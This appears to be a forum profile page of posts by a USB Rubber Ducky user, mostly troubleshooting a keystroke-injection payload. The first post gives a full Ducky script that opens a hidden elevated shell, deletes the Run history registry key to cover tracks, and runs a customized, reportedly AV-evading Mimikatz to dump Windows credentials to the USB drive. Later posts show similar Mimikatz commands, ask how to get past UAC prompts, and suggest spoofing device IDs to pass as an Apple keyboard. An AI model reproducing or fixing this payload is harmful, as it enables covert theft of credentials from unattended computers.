L07TB0Y

Active Members
  • Posts

    42
Posts posted by L07TB0Y

  1. Here is my code:

    DELAY 3000
    ESC
    DELAY 300
    GUI r
    DELAY 500
    ENTER
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    DELAY 1000
    ALT Y
    DELAY 1000
    LEFTARROW
    DELAY 300
    ENTER
    DELAY 500
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d
    DELAY 300
    ENTER
    DELAY 1000
    STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';"
    DELAY 300
    ENTER

     

     

    Issue 1:

    The UAC is not going away by either ALT Y or LEFTARROW and ENTER, but even after this, if I click OK manually, it does not work.

    FILES is the name of the Rubber Ducky.

    lb.ps1 is the customized mimi that does not get detected by AV etc.

    What am I doing wrong?

  2. Check out Darren and Snubs' YouTube channel; that is a wealth of knowledge. In any case, if you are lazy you can change the PIV/DIV of the ducky to make it look like an Apple keyboard, and Apple will not ask you to set up the keyboard.

    Check out the wiki for the rest of your stuff.

  3. Well, looks like Win10 is now blocking scripts; it could be because I am running Win 10 Enterprise.

     

    PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Ou
    t-File '%duck%\%computername%_creds.txt';"
    .\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information,
    see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
    At line:1 char:1
    + .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module  ...
    + ~~~~~~~~
        + CategoryInfo          : SecurityError: (:) [], PSSecurityException
        + FullyQualifiedErrorId : UnauthorizedAccess 

  4. On 1/14/2017 at 3:08 PM, henna3 said:

    I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the UAC prompt comes up, it comes up as a non-active window. So, when Alt+Y is being pressed, it's not being pressed in the UAC prompt window. Is there any way to fix this issue/workaround?

    Amazing twin duck payload!

    Thanks.

    Did you find a solution? I am running into the same thing, and well, even if I choose to run the UAC I am not getting a file so 
